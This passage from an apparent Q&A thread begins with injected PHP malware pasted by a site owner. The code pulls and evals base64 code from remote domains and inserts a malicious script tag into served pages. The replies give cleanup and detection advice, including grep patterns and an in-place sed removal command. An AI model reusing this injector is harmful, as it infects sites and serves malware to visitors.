$content = #trycurl_777($url);
if ($content !== false)
return $content;
$content = #tryfile_777($url);
if ($content !== false)
return $content;
$content = #tryfopen_777($url);
if ($content !== false)
return $content;
$content = #tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = #trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777($url)
{
if (function_exists('file') === false)
return false;
$inc = #file($url);
$buf = #implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = #fopen($url, 'r');
if ($f) {
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = #fsockopen($host, 80, $errno, $errstr, 30);
if (!$f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function trysocket_777($url)
{
if (function_exists('socket_create') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = #gethostbyname($host);
$ip2 = #long2ip(#ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = #socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!#socket_connect($sock, $ip1, 80)) {
#socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
#socket_close($sock);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function update_tds_file_777($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (#file_exists($tdsfile)) {
$mtime = #filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = #file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = #explode("\n", $content);
$c = #count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (!#is_dir($rz)) {
#mkdir($rz);
if (#is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (!#is_dir($rz)) {
#mkdir($rz);
if (#is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/');
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
$_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php') . $d;
$_SERVER['s_script'] = "nl.php?p=d";
}
setup_globals_777();
if (!function_exists('gml_777')) {
function gml_777()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
return $r_string_777;
}
}
if (!function_exists('gzdecodeit')) {
function gzdecodeit($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
ob_start('mrobh');
}
}
?>
First, shut off your site until you can figure out how he got in and how to fix it. That looks like it's serving malware to your clients.
Next, search through your PHP files for fgets, fopen, fputs, eval, or system. I recommend Notepad++ because of its "Find in Files" feature. Also, make sure that's the only place your PHP has been modified. Do you have an offline copy to compare against?
To get rid of these malicious PHP files you simply need to remove them. If a file is infected, you need to remove only the part which looks suspicious.
It's always tricky to find these files, because usually there are multiple copies of them across your web root.
Usually, if you see some kind of obfuscation, it's a red alert.
Most malware is easy to find based on the common functions it uses, which include:
base64_decode,
lzw_decompress,
eval,
and so on
By using an encoded format, they compact their size and make themselves more difficult for non-experienced users to decode.
Here are few grep commands which may find the most common malware PHP code:
grep -R "return.*base64_decode" .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .
You can run these commands on the server, or after you have synchronised your website to your local machine (via FTP, e.g. ncftpget -R).
Or use scanning tools which are specially designed for finding that kind of malicious file; see: PHP security scanners.
For education purposes, here is a collection of PHP exploit scripts found when investigating hacked servers, available at the kenorb/php-exploit-scripts GitHub repository (influenced by @Mattias' original collection). This will give you an understanding of what these suspicious PHP files look like, so you can learn how to find more of them on your server.
See also:
What does this malicious PHP script do?
Drupal: How to remove malicious scripts from admin pages after being hacked?
My websites, or websites I host, were hit several times with similar attacks.
I present what I did to resolve the issue. I don't pretend it's the best or easiest approach, but it works, and since then I have been able to stay proactively on top of things.
Solve the issue ASAP.
I created a very simple PHP script (it was written while the iron was hot, so maybe it's not the most optimized code, BUT it solves the problem pretty fast):
http://www.ecommy.com/web-security/clean-php-files-from-eval-infection
Make sure you know when something like this hits again. Hackers use all kinds of approaches, from SQL injection of one of the external modules you install, to brute-forcing your admin panel with dictionary attacks or well-known password patterns like 1qaz..., qwerty..., etc.
I present the scripts here:
http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections
the cron entry would be something like:
0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1&
I updated the pages so the files can be downloaded directly.
Hope it will be as useful for you as it is for me :)
Ensure any popular web applications like WordPress or vBulletin are updated. There are many exploits for old versions that can lead to your server being compromised, and it will probably happen again if they are not updated. There is no use in proceeding until this is done.
If the files keep getting replaced then there is a rootkit or trojan running in the background. That file cannot replicate itself. You will have to get rid of the rootkit first. Try rkhunter, chkrootkit, and LMD. Compare the output of ps aux to a secured server and check /var/tmp and /tmp for suspicious files. You might have to reinstall the OS.
Ensure all workstations administrating the server are up to date and clean. Do not connect via insecure wireless connections or use plain text authentication like with FTP (use SFTP instead). Only log into control panels with https.
To prevent this from happening again run csf or comparable firewall, daily LMD scans, and stay current with the latest security patches for all applications on the server.
I had the same issue, and when I deleted the code it was regenerated automatically. I did these steps and it works fine now:
1 - Limit SSH access
I saw some SSH login attempts and guess they may be related to this malware!
2 - Enable SELinux
Remember to configure SELinux file-access permissions for nginx.
3 - Remove eval(base64_decode(...))
Remove lines containing eval(base64_decode(...)) from all index.php files [in the root folder, plugin folders, and so on].
Assuming this is a Linux-based server and you have SSH access, you could run this to remove the offending code:
find . -name "*.php" | xargs sed -i 's#eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;##'
This covers all known base64 implementations, and it will work whether the base64 text is surrounded by single or double quotes.
EDIT: now works with internal whitespace also.
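If you want to see which files would be touched before editing them in place, a listing pass first is a reasonable precaution (assuming GNU grep):
grep -rl --include="*.php" "eval(base64_decode" .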
